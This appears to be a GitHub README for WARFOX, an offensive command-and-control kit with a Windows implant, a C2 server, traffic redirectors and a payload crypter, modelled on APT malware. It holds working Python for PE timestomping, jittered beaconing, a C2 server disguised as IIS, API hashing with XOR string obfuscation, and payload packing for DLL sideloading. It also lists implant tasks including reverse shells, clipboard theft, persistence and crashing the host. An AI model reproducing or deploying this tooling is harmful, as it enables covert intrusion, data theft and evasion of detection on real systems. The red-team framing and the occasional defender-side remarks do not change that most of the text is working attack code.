WARFOX is a software-based HTTPS beaconing Windows implant that uses a multi-layered proxy network for C2 communications.

Overview

WARFOX is a software-based Windows implant that beacons over HTTPS and routes its C2 traffic through a multi-layered proxy network. The kit was designed to emulate covert APT offensive operations. It includes WARFOX (the Windows implant), HIGHTOWER (the C2 server), and supporting tools for building configurations and setting up the proxy network.

Inspiration for this kit is taken from implants developed by EMISSARY PANDA (APT27) and WICKED PANDA (APT41); various techniques and TTPs were drawn from public reports on APT malware.

Included Tools and Scripts

  • WARFOX: A software implant written in C++ that targets Windows systems to support the post-exploitation phase of an offensive operation. It exposes 12 features to the operator in the form of tasks (commands) and is designed to evade both host-based and network-based detection.
  • HIGHTOWER: A Python HTTP server that manages hosts implanted with WARFOX and delivers tasks to them; communications are protected with TLS using a self-signed certificate.
  • LIGHTBEAM: A TCP traffic redirector used to mask traffic between WARFOX and HIGHTOWER. Redirectors can be daisy-chained to form a multi-level proxy network.
  • FILEGUARD: A file compressor and crypter that uses zlib and AES-128 (CBC mode) to compress and obfuscate files.
  • edit_timestamp.py: Rewrites the PE header timestamp to a random date up to 90 days in the past.
  • build_config.py: Generates the AES-encrypted configuration data for your HIGHTOWER IP:PORT pair.
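
The timestamp rewrite that edit_timestamp.py performs, shown here as an added example rather than the kit's own script (whose source is not reproduced on this page). It patches IMAGE_FILE_HEADER.TimeDateStamp in the COFF header to a random instant up to 90 days in the past, after checking the MZ and PE signatures so a non-PE file is refused instead of silently corrupted. The function names, the minimal_pe() stub used as constructed input, and the 90-day default are assumptions of this example.

```python
# Added example: PE timestomping of IMAGE_FILE_HEADER.TimeDateStamp (not the kit's script).
import random
import struct
import time

DAY_SECONDS = 86400


def pe_timestamp_offset(pe: bytes) -> int:
    """Return the file offset of IMAGE_FILE_HEADER.TimeDateStamp after validating the headers."""
    if len(pe) < 0x40 or pe[:2] != b"MZ":
        raise ValueError("missing MZ signature")
    e_lfanew = struct.unpack_from("<I", pe, 0x3C)[0]
    # The 4-byte PE signature must be followed by the 20-byte IMAGE_FILE_HEADER.
    if e_lfanew + 4 + 20 > len(pe) or pe[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("bad e_lfanew or missing PE signature")
    # IMAGE_FILE_HEADER layout: Machine(2) NumberOfSections(2) TimeDateStamp(4) ...
    return e_lfanew + 4 + 4


def is_pe(data: bytes) -> bool:
    """True when the DOS and PE headers are present and consistent."""
    try:
        pe_timestamp_offset(data)
        return True
    except ValueError:
        return False


def read_timestamp(pe: bytes) -> int:
    return struct.unpack_from("<I", pe, pe_timestamp_offset(pe))[0]


def set_timestamp(pe: bytes, ts: int) -> bytes:
    """Return a copy of pe with TimeDateStamp replaced by ts (seconds since the Unix epoch)."""
    if not 0 <= ts <= 0xFFFFFFFF:
        raise ValueError("timestamp must fit in 32 bits")
    off = pe_timestamp_offset(pe)
    return pe[:off] + struct.pack("<I", ts) + pe[off + 4:]


def random_past_timestamp(now=None, max_days: int = 90, seed=None) -> int:
    """Pick a uniformly random instant between now - max_days and now."""
    now = int(time.time()) if now is None else int(now)
    return now - random.Random(seed).randint(0, max_days * DAY_SECONDS)


def timestomp_file(path: str, max_days: int = 90) -> int:
    """Rewrite the PE timestamp in place and return the new value."""
    with open(path, "rb") as fh:
        data = fh.read()
    ts = random_past_timestamp(max_days=max_days)
    with open(path, "wb") as fh:
        fh.write(set_timestamp(data, ts))
    return ts


def minimal_pe(ts: int = 0) -> bytes:
    """Constructed stub: DOS header, PE signature and one IMAGE_FILE_HEADER (x64, not loadable)."""
    dos = bytearray(0x40)
    dos[:2] = b"MZ"
    struct.pack_into("<I", dos, 0x3C, 0x40)   # e_lfanew: PE header directly after the DOS header
    coff = struct.pack("<HHIIIHH", 0x8664, 1, ts, 0, 0, 0, 0x22)
    return bytes(dos) + b"PE\0\0" + coff


if __name__ == "__main__":
    import sys
    print(timestomp_file(sys.argv[1]))
```

Only the compile timestamp in the COFF header is changed; file-system MAC times are untouched, so verify the result with a PE header viewer rather than a directory listing.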

Network Architecture and Design

LIGHTBEAM TCP traffic redirectors can be daisy-chained to form a multi-layered proxy network that masks traffic between a host running WARFOX and HIGHTOWER. LIGHTBEAM relies on socat for the redirection and runs on Linux hosts.

  • Traffic between WARFOX hosts and HIGHTOWER is encrypted with TLS using a self-signed certificate
  • WARFOX hosts periodically beacon over HTTPS to HIGHTOWER's HTTP server
  • When an operator issues a new task for a WARFOX host, the task command is returned in the HTTP response to the host's next beacon, where WARFOX's tasking engine processes it


HIGHTOWER exposes two dedicated HTTPS endpoints, one for beacon check-ins and one for task results.

  • Endpoint #1 (/update) receives inbound beacon requests from WARFOX hosts; host sessions are keyed on the id field of the beacon packet.
  • Endpoint #2 (/finish) receives the results of issued task commands; the results are displayed to the operator who issued the task.

Secure Communications

WARFOX beaconing and tasking responses were designed to evade common network detection techniques.

  • Beaconing intervals are randomized with jitter to avoid easy-to-spot fixed periods. This is implemented as a sleep call with a random value between network requests.
  • Network traffic is encrypted with TLS, so Snort or Suricata rules cannot match on the beacon or task payloads. Additionally, the self-generated certificates carry null (empty) values in their identifying fields so they cannot easily be detected or blacklisted on that information. Note that TLS hides payload content only: beacon timing, request sizes and the TLS client fingerprint remain visible to a network sensor.
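
The jitter mechanism above, as an added illustration in Python rather than the implant's C++ (this is not WARFOX code): next_beacon_delay() draws each sleep uniformly around a base interval, and interval_cv()/looks_periodic() are the inter-arrival regularity check a network sensor would run against check-in timestamps, which is exactly what the jitter is meant to defeat. The function names, the 5% threshold and the simulated timestamps are assumptions of this example.

```python
# Added example: jittered beacon sleep and the periodicity heuristic it is designed to evade.
import random
import statistics


def next_beacon_delay(base_seconds: float, jitter: float, rng=random) -> float:
    """Sleep before the next check-in: uniform in [base*(1-jitter), base*(1+jitter)]."""
    if base_seconds <= 0 or not 0.0 <= jitter <= 1.0:
        raise ValueError("base must be positive and jitter must lie in [0, 1]")
    return rng.uniform(base_seconds * (1 - jitter), base_seconds * (1 + jitter))


def simulate_checkins(count: int, base_seconds: float, jitter: float, seed: int = 1):
    """Constructed check-in timestamps (seconds from start) for one implant with the given jitter."""
    rng = random.Random(seed)
    t, times = 0.0, []
    for _ in range(count):
        t += next_beacon_delay(base_seconds, jitter, rng)
        times.append(t)
    return times


def interval_cv(timestamps) -> float:
    """Coefficient of variation of the inter-arrival gaps; 0.0 means a perfectly regular beacon."""
    if len(timestamps) < 3:
        raise ValueError("need at least two gaps")
    gaps = [b - a for a, b in zip(timestamps, timestamps[1:])]
    return statistics.pstdev(gaps) / statistics.mean(gaps)


def looks_periodic(timestamps, cv_threshold: float = 0.05) -> bool:
    """Defender-side heuristic: flag a flow whose gaps vary by less than cv_threshold."""
    return interval_cv(timestamps) < cv_threshold
```

Jitter only smears the period; the number of connections to one destination over a day, the near-constant request size, and the destination itself are unaffected, so pair it with the proxy layering rather than relying on it alone.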

WARFOX

  • Beaconing Engine:

    • The beaconing engine prepares the periodic check-in requests sent to HIGHTOWER. Each beacon carries information about the infected system: the hostname, the current user's username, the system architecture, and more. This information is packaged into a JSON object, Base64-encoded, and sent to HIGHTOWER's /update endpoint.
  • Tasking Engine:

    • When an operator issues a new task for the implant, the command is set as the default HTTP response. When the implant sees that a new task was issued, the tasking engine parses it to determine which functionality to execute. The corresponding function (get_processes, for example) is run and its result is packaged into a task_response JSON object, which is exfiltrated to HIGHTOWER's /finish endpoint.
  • Networking Engine:

    • Beacon check-ins and task responses use the networking engine to send HTTPS requests to HIGHTOWER through the Windows WinInet API. HTTPS is enabled on each request before it is sent.
  • Protected Configuration:

    • The embedded HIGHTOWER IP address and port are stored encrypted in the implant configuration and decrypted with AES-128 in CBC mode only when needed. New configurations can be created with the build_config.py script in the /scripts directory.
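
The /update and /finish exchange described above, modelled in Python as an added example (this is not HIGHTOWER's or WARFOX's code). Both sides are shown: build_beacon() and build_task_response() do the JSON-then-Base64 packaging the implant performs, and Hightower keeps the session table keyed on the beacon id, hands one queued task back in the beacon response, and records task results. Handler is http.server glue that makes the Server header read like IIS, as the HIGHTOWER section notes. The JSON field names, the per-session task queue (the text only says the task becomes the default response), and the class and function names are assumptions of this example.

```python
# Added example: the beacon/tasking exchange between WARFOX and HIGHTOWER, modelled in Python.
# Not the project's code; field names, the per-session queue and the Handler class are assumptions.
import base64
import binascii
import json
import ssl
from dataclasses import dataclass, field
from http.server import BaseHTTPRequestHandler, HTTPServer


def encode_packet(obj) -> str:
    """JSON object -> Base64 text, the packaging the README describes for both endpoints."""
    return base64.b64encode(json.dumps(obj).encode()).decode()


def decode_packet(body: str):
    """Reverse of encode_packet; returns None instead of raising so garbage never kills the server."""
    try:
        data = json.loads(base64.b64decode(body, validate=True))
    except (ValueError, binascii.Error):
        return None
    return data if isinstance(data, dict) else None


def build_beacon(host_id: str, hostname: str, username: str, arch: str) -> str:
    """Implant side: system facts sent to /update on every check-in."""
    return encode_packet({"id": host_id, "hostname": hostname, "username": username, "arch": arch})


def build_task_response(host_id: str, task: str, output: str) -> str:
    """Implant side: task_response object sent to /finish after a task has run."""
    return encode_packet({"id": host_id, "task": task, "output": output})


@dataclass
class Session:
    info: dict
    pending: list = field(default_factory=list)   # queued task lines, oldest first
    results: list = field(default_factory=list)   # task_response objects received


class Hightower:
    """Server side: session table keyed on the beacon id, plus the two endpoints."""

    def __init__(self):
        self.sessions = {}

    def issue(self, host_id: str, task_line: str):
        self.sessions[host_id].pending.append(task_line)   # KeyError for a host that never beaconed

    def handle_update(self, body: str):
        data = decode_packet(body)
        host_id = data.get("id") if data else None
        if not isinstance(host_id, str) or not host_id:
            return 400, ""
        sess = self.sessions.setdefault(host_id, Session(info=data))
        sess.info = data                                    # refresh host facts on every beacon
        return 200, (sess.pending.pop(0) if sess.pending else "")

    def handle_finish(self, body: str):
        data = decode_packet(body)
        sess = self.sessions.get(data.get("id")) if data else None
        if sess is None or "task" not in data or "output" not in data:
            return 400, ""
        sess.results.append(data)
        return 200, ""

    def route(self, path: str, body: str):
        if path == "/update":
            return self.handle_update(body)
        if path == "/finish":
            return self.handle_finish(body)
        return 404, ""


class Handler(BaseHTTPRequestHandler):
    """http.server glue; the Server header is made to read like IIS, as HIGHTOWER does."""
    server_version = "Microsoft-IIS/10.0"
    hightower = Hightower()

    def version_string(self):
        return self.server_version        # drop the default "Python/x.y" suffix

    def do_POST(self):
        length = int(self.headers.get("Content-Length", "0"))
        body = self.rfile.read(length).decode("latin-1")
        status, reply = self.hightower.route(self.path, body)
        self.send_response(status)
        self.send_header("Content-Type", "text/plain")
        self.send_header("Content-Length", str(len(reply)))
        self.end_headers()
        self.wfile.write(reply.encode())


def serve(port: int, certfile: str = "localhost.pem"):
    """Listen over TLS using a combined key+certificate PEM such as the OpenSSL command in the HIGHTOWER usage guide produces."""
    httpd = HTTPServer(("0.0.0.0", port), Handler)
    ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
    ctx.load_cert_chain(certfile)
    httpd.socket = ctx.wrap_socket(httpd.socket, server_side=True)
    httpd.serve_forever()
```

Every malformed body returns 400 rather than raising, and an unknown path returns 404: a C2 endpoint that crashes or stack-traces on a scanner's probe gives itself away faster than any signature.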

Supported Tasks

The WARFOX implant supports 12 operator-provided tasks, listed below with their categories. Tasks in the Interaction category take an additional argument to carry out the operation; see the Interaction Command Examples in the HIGHTOWER usage guide.

Task Command   | Description                                                 | Category
---------------|-------------------------------------------------------------|----------------------
get_processes  | List the running processes using NtQuerySystemInformation   | Information Gathering
get_drivers    | List the loaded drivers using NtQuerySystemInformation      | Information Gathering
get_users      | List information about the users on the system              | Information Gathering
get_clipboard  | Get a copy of the clipboard contents                        | Information Gathering
find_files     | Locate files with a given extension in a directory          | Interaction
del_file       | Delete a file                                               | Interaction
kill_pid       | Kill a process by its PID                                   | Interaction
rev_shell      | Spawn an interactive reverse shell to a given IP:PORT       | Interaction
exec_command   | Execute a system command                                    | Execution
bsod           | Crash the system with a BSOD                                | Other
reg_persist    | Persist via the Registry using the RunOnce key              | Other
uninstall      | Uninstall and remove artifact traces from the remote system | Other

Evasion Mechanisms

  • Sensitive strings are obfuscated with a compile-time XOR obfuscation library
  • The embedded IP:PORT configuration is encrypted with AES
  • API function calls are resolved at run time through API hashing with the SuperFastHash algorithm, so the names never appear in the import table or as plain strings
  • (Recommended) The binary is compiled with LLVM-Obfuscator
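
API hashing and the XOR string stash, as an added Python example rather than WARFOX's C++ (none of this is the project's code). superfasthash() follows Paul Hsieh's reference algorithm with 32-bit wraparound; build_hash_table() is the build-time side (what gets embedded instead of import names), resolve_by_hash() is the run-time side walking an export name table, and find_collisions() is the check worth running before shipping a hash table. The NTDLL_EXPORTS list is a constructed stand-in for an export table (the names are real ntdll exports, but the list is not read from a DLL), and the single-byte XOR key is a simplification of whatever the real library does.

```python
# Added example: API hashing with SuperFastHash, plus an XOR string stash (not WARFOX's source).
MASK32 = 0xFFFFFFFF


def superfasthash(data: bytes) -> int:
    """Paul Hsieh's SuperFastHash over raw bytes, mirroring the C reference with 32-bit wraparound."""
    if not data:
        return 0

    def u16(i):                     # little-endian 16-bit read, as get16bits() in the reference
        return data[i] | (data[i + 1] << 8)

    def s8(i):                      # the (signed char) cast used in the tail cases
        return data[i] - 256 if data[i] > 127 else data[i]

    h = len(data)
    rem = len(data) & 3
    pos = 0
    for _ in range(len(data) >> 2):          # main loop: four bytes per round
        h = (h + u16(pos)) & MASK32
        tmp = ((u16(pos + 2) << 11) ^ h) & MASK32
        h = ((h << 16) ^ tmp) & MASK32
        pos += 4
        h = (h + (h >> 11)) & MASK32
    if rem == 3:
        h = (h + u16(pos)) & MASK32
        h ^= (h << 16) & MASK32
        h ^= (s8(pos + 2) << 18) & MASK32
        h = (h + (h >> 11)) & MASK32
    elif rem == 2:
        h = (h + u16(pos)) & MASK32
        h ^= (h << 11) & MASK32
        h = (h + (h >> 17)) & MASK32
    elif rem == 1:
        h = (h + s8(pos)) & MASK32
        h ^= (h << 10) & MASK32
        h = (h + (h >> 1)) & MASK32
    # final avalanche
    h ^= (h << 3) & MASK32
    h = (h + (h >> 5)) & MASK32
    h ^= (h << 4) & MASK32
    h = (h + (h >> 17)) & MASK32
    h ^= (h << 25) & MASK32
    h = (h + (h >> 6)) & MASK32
    return h


def build_hash_table(api_names):
    """Build-time side: the hashes the implant embeds instead of import names."""
    return {name: superfasthash(name.encode("ascii")) for name in api_names}


def find_collisions(export_names):
    """Build check: two exports sharing a hash would make run-time resolution ambiguous."""
    seen, clashes = {}, []
    for name in export_names:
        h = superfasthash(name.encode("ascii"))
        if h in seen:
            clashes.append((seen[h], name))
        seen[h] = name
    return clashes


def resolve_by_hash(target: int, export_names):
    """Run-time side: walk the export name table and return the name whose hash matches."""
    for name in export_names:
        if superfasthash(name.encode("ascii")) == target:
            return name
    return None


def xor_obfuscate(text: str, key: int) -> bytes:
    """Stand-in for the compile-time XOR library: what lands in .rdata instead of the plain string."""
    return bytes(b ^ key for b in text.encode())


def xor_deobfuscate(blob: bytes, key: int) -> str:
    return bytes(b ^ key for b in blob).decode()


# Constructed stand-in for an export name table; in the implant this is walked from the loaded module.
NTDLL_EXPORTS = ["NtClose", "NtOpenProcess", "NtQuerySystemInformation",
                 "NtTerminateProcess", "RtlGetVersion"]
```

Hashing hides the names from static import analysis, but the hash constants themselves are a signature: public tables map SuperFastHash values of common Windows APIs back to names, which is one reason the page recommends LLVM-Obfuscator on top.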

Dependencies

WARFOX relies on a few third-party libraries, which makes it susceptible to detection based on known code patterns or signatures. While these libraries made development easier, a future goal is to implement everything from scratch.

Antivirus Detection

At the time of writing, the compiled WARFOX implant was not detected by any AntiVirus product on VirusTotal. Detection results change as vendors update signatures, and samples uploaded to VirusTotal are shared with vendors, so a clean scan is a point-in-time observation rather than a guarantee.


HIGHTOWER

Overview

HIGHTOWER is a Python-based HTTP server that supports WARFOX infections; it is built on the http.server module. HIGHTOWER mimics a legitimate IIS web server in its responses.

Usage Guide

You can use the !help terminal command to display the help menu, which gives an overview of how to configure the server for the first time and which tasks you can issue to WARFOX.

You can use the !settings terminal command to display the current server settings. You must set a listening port with !listen before issuing tasks.

The !listen server command takes a port to listen on; after it runs, the SRVPORT setting is populated.

After you set a listening port, you can issue new tasks to hosts that beacon to HIGHTOWER with the !issue command. Certain tasks, such as rev_shell, require additional data; the list of commands that take arguments is in the technical documentation PDF and in the Interaction Command Examples below.

New certificates for enabling TLS/HTTPS can be generated with OpenSSL. The following command writes both the private key and the self-signed certificate into localhost.pem:

openssl req -new -x509 -keyout localhost.pem -out localhost.pem -days 365 -nodes

Interaction Command Examples

  • !issue find_files c:\users\maxim\documents\*
  • !issue del_file c:\users\maxim\documents\test.docx
  • !issue kill_pid 5597
  • !issue exec_command calc.exe
  • !issue rev_shell 192.168.55.103:4443

LIGHTBEAM

LIGHTBEAM is a Bash-based TCP traffic redirector that can be used to mask traffic between WARFOX and HIGHTOWER. Because it forwards raw TCP, the TLS session still terminates at HIGHTOWER; the redirectors never see plaintext.

To configure LIGHTBEAM you need to set the following variables:

  1. LOCAL_LISTENING_PORT is the local port that receives inbound TCP traffic from WARFOX (or from the previous LIGHTBEAM layer)
  2. C2_SERVER_IP is the IP address of the next hop to redirect traffic to (the next LIGHTBEAM layer or HIGHTOWER itself)
  3. C2_SERVER_PORT is the port that the next hop is listening on

FILEGUARD

FILEGUARD has a dedicated GitHub repository. This utility compresses files with zlib and encrypts them with AES-128 in CBC mode; the AES key is randomly generated and appended to the packed file.

Technical Details

FILEGUARD takes a file as input, compresses it with zlib, encrypts it with AES-128 in CBC mode, and appends the AES key to the end of the output. The utility was designed to pack the WARFOX DLL implant for its DLL sideloading execution chain. Since the key travels inside the packed file, this defeats static signatures on the payload but does not protect it from anyone who recovers the file.

  1. You provide an input file (any file type should work) as argv[1] and the desired output file as argv[2]
  2. FILEGUARD compresses the input file with zlib and writes a copy to disk
  3. FILEGUARD encrypts the compressed file with AES-128 in CBC mode under a randomly generated key
    • The AES IV is hardcoded as ffffffffffffffff to keep the dropper's key parsing simple, but it could be randomized
  4. The AES key is appended to the file so the dropper utility can locate it
  5. A copy of the finalized binary is written to an output text file, formatted as a BYTE array that can be embedded in the dropper
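
The packing procedure above, end to end, as an added Python example (not FILEGUARD's own code): pack() compresses with zlib, encrypts with AES-128-CBC under the fixed IV, and appends the key; unpack() is what the dropper has to do in reverse; to_c_byte_array() renders step 5. Assumptions of this example: PKCS#7 padding (the page does not say how the last block is padded), the IV taken as the 16 ASCII bytes "ffffffffffffffff", a 16-byte key trailer, and the third-party `cryptography` package for AES.

```python
# Added example: FILEGUARD's container layout (zlib -> AES-128-CBC -> trailing key) and the
# dropper-side unpack. Not the utility's code; padding, IV bytes and key length are assumptions.
import os
import zlib
from cryptography.hazmat.primitives import padding
from cryptography.hazmat.primitives.ciphers import Cipher, algorithms, modes

IV = b"ffffffffffffffff"   # the hardcoded IV from the README, assumed to be these 16 ASCII bytes
KEY_LEN = 16               # AES-128


def pack(plaintext: bytes, key: bytes = None) -> bytes:
    """Compress, encrypt, then append the key: the blob carries everything needed to open it."""
    key = os.urandom(KEY_LEN) if key is None else key
    if len(key) != KEY_LEN:
        raise ValueError("AES-128 needs a 16-byte key")
    compressed = zlib.compress(plaintext, 9)
    padder = padding.PKCS7(128).padder()
    padded = padder.update(compressed) + padder.finalize()
    enc = Cipher(algorithms.AES(key), modes.CBC(IV)).encryptor()
    return enc.update(padded) + enc.finalize() + key


def unpack(blob: bytes) -> bytes:
    """Dropper side: peel the trailing key, decrypt with the fixed IV, strip padding, decompress."""
    if len(blob) < KEY_LEN + 16 or (len(blob) - KEY_LEN) % 16:
        raise ValueError("blob too short or ciphertext not block aligned")
    key, ciphertext = blob[-KEY_LEN:], blob[:-KEY_LEN]
    dec = Cipher(algorithms.AES(key), modes.CBC(IV)).decryptor()
    padded = dec.update(ciphertext) + dec.finalize()
    unpadder = padding.PKCS7(128).unpadder()
    compressed = unpadder.update(padded) + unpadder.finalize()
    return zlib.decompress(compressed)


def to_c_byte_array(blob: bytes, name: str = "payload", per_line: int = 12) -> str:
    """Step 5: render the blob as a C array the dropper can embed."""
    rows = [", ".join(f"0x{b:02x}" for b in blob[i:i + per_line])
            for i in range(0, len(blob), per_line)]
    header = f"unsigned char {name}[{len(blob)}] = " + "{\n    "
    return header + ",\n    ".join(rows) + "\n};\n"


def pack_file(src: str, dst: str) -> str:
    """The argv[1] -> argv[2] flow from the steps above; also writes dst + '.txt' with the array."""
    with open(src, "rb") as fh:
        blob = pack(fh.read())
    with open(dst, "wb") as fh:
        fh.write(blob)
    with open(dst + ".txt", "w") as fh:
        fh.write(to_c_byte_array(blob))
    return dst + ".txt"
```

With a fixed IV and a fixed key, pack() is deterministic, so two builds of the same payload produce byte-identical blobs; the random key is what keeps repeated packs of one payload from sharing a signature.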

Issues

  • Timestomp python script does not work

    Hi,

    I was trying out the edit_timestamp.py script but it does not change the date on an EXE file for me. I checked the date with CFF Explorer but it didn't change. Any ideas what may be wrong?

    opened by carlnykvist